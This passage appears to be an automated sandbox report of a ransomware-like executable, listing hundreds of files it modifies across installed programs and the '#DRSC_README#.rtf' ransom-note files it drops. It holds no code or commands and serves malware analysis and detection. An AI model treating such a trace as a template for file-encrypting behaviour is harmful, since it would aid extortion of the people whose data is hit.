710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\edit-pdf.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-nodes_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\ca-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Extensions\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_nextarrow_default.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_unselected_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\example_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\de-de\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\README-JDK.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\pl_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\en-GB.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.services_1.1.0.v20140328-1925.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-threaddump.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\bg_patterns_header.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\sample-thumb.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-Bold.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\sound.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\example_icons2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\CourierStd.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\RHP_icons.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_newfolder-default.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\zh-tw_get.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derby.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\sl\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-tw\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.security_8.1.14.v20131031.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\cs-cz\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\cloud_secured.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\deploy\messages_pt_BR.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaBrightDemiBold.ttf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\eu-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\LogoDev.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\unpack200.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-windows.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_distributed.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\duplicate.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_filetype_xd.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-cn\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.xml_1.3.4.v201005080400.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\themes\dark\new_icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\keytool.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\license.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\browser\features\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-ui-theme.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\mobile_reader_logo.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\pl-pl\PlayStore_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\sat_logo_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hr-hr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javah.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\s_close_h.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\pt-br\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-execution.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ru-ru\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-ae\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbytools.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\logging.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\export.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pl-pl\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner_Dark.pdf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\check.cur 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\main-selector.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\uk-ua\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugins\rhp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_empty_state.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\warning_2x.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\it-it\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\currency.data 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ro-ro\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ko-kr\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\close.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nl\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\es-es\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adc_logo.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\adobe_spinner.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-up.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons_retina.png 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\virgo_mycomputer_folder_icon.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\root\ui-strings.js 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\s_thumbnailview_18.svg 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 